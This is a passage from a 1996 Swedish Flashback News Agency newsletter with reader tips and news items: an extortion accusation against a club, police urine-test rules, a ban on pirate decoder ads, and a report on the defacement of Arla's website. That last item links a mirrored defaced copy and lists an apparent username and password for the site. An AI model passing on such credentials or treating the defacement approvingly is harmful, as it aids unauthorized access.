begärde att de skulle få hela biljettkassan, eftersom arrangörerna inte hade bett DEM om tillstånd att ha festen där... De hotade både **** och **** som jobbar där, men de sa att de inte skulle få ett öre, särkilt inte innan de snackat med arrangören vems pengar det var. Så Denvers-killarna ringde till **** [arrangören] och skrämde livet ur honom, så han skänkte dem 6000! Alla pengar de fått in, så tillslut gick de back, trots en lyckad fest... Världen är för fan inte rättvis... Jag säger bara... Bojkotta alla fester på Denvers!! De förtjänar inget mer stöd." (Inskickat av: J) ------------------------------ * NÄR KAN POLISEN KRÄVA URINPROV AV DIG För att polisen ska få ta ett urinprov krävs att personen är skäligen misstänkt för att vara drogpåverkad. Misstanken grundas på följande: *Personens påverkansgrad *Personen känd som missbrukare *Platsen är ett känt drogtillhåll *Personen beteende, till exempel köp/säljsituation. *Övriga tecken. Minimala pupiller tyder på heroin, stora pupiller på amfetamin eller hasch. *Tips om missbruk har inkommit. Polisen har heller ingen rätt att kolla väskor om inte skälig misstankte till brott ligger bakom. t.ex nåt olagligt sticker ut. (Inskickat av: TeknoHead / källa: GP) ------------------------------ * ANNONSSTOPP FÖR PIRATDEKODRAR Marknadsdomstolen förbjuder Gula Tidningen att föra in annonser från företag som säljer olaglig avkodningsutrustning. Domen är en framgång för betal-TV-branschen som förlorar stora pengar på grund av att piratdekodrar florerar på marknaden. En dekoder gör det möjligt för den som betalar, för att få tillgång till en betal-TV-kanal, att se programmen på sin TV. För att distributörerna inte ska gå miste om dessa inkomster är dekodrar som ej är kopplade till ett betal-TV-abonnemang förbjudna i Sverige. Lagen gör det kriminellt att både tillverka, sälja, hyra ut och installera förbjuden utrustning. Branschen anser sig föra en ojämn kamp mot tillverkare och försäljare av den olagliga utrustningen. Särskilt som försäljningen ofta sker via postorder från utlandet. För att nå kunder i Sverige är de illegala försäljarna beroende av att kunna annonsera i svenska media. Efter påtryckningar från betal-TV-företagen har praktiskt taget landets alla tidningar slutat föra in annonser för olaglig avkodningsutrustning. Ett undantag är Gula Tidningen som, enligt branschen, utvecklats till ett viktigt annonsforum för illegala dekodrar, vilket marknadsdomstolen nu sätter stopp för. Domen förenas på begäran av branschföretagen inte med något vite. Orsaken är att Gula Tidningen under processens gång lovat branschen bot och bättring. (källa: TT) ------------------------------ * ARLAS HEMSIDA FICK BESÖK AV HACKERS I SÖNDAGS I söndags kl. 17:46 fick mjölkföretaget ARLA sin hemsida saboterade. Förutom div. meddelanden ang. ARLA's säkerhet så lade man även in en porrbild på hemsidan. För de som missade sidan, så finns den crackade versionen nu även upplagd på Flashbacks Webhotel. ARLA - crackad version: URL: http://flashback.se/~arla/ ARLA - ocrackad version: URL: http://www.arla.se User: arla Password: arla (Inskickat av: montezuma) ------------------------------ * PS. - KOLLA IN Adolf Hitler als Maler und Zeichner: http://www.geocities.com/Paris/1889/ (Tavlor målade av Adolf Hitler. För konstsamlaren?) +++ Vet du om någon intressant nyhet, eller känner till någon kul notis. Maila den då gärna till: fna@flashback.se. _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ F L A S H B A C K N E W S A G E N C Y ( F N A ) / F L A S H B A C K : email: fna@flashback.se / flashback@flashback.se www: http://www.flashback.se/ irc: #flashback (EFNet / DALnet) ftp: ftp.flashback.se + + + prenumeration på fna (flashback news agency): gratis (!!!) prenumeration på flashback - sverige (3 nummer): 150kr (självkostnadspris). stödprenumeration på flashback (3 nummer): 200kr. prenumeration på flashback - norden (3 nummer): 200kr. prenumeration på flashback - övriga världen (3 nummer): 220kr. postgiro: 39 64 28-5. bankgiro: 5355-6866 postadress: flashback, box 676, 114 79 stockholm, sverige +++ Avslutande din prenumeration genom meddelandet: "unsubscribe FNA". Påbörja ny prenumeration genom meddelandet: "subscribe FNA". © NO COPYRIGHT / NO RIGHTS RESERVED - FLASHBACK MAGAZINE / 1996 ==========E==N==D=====F==I==L==E=====================================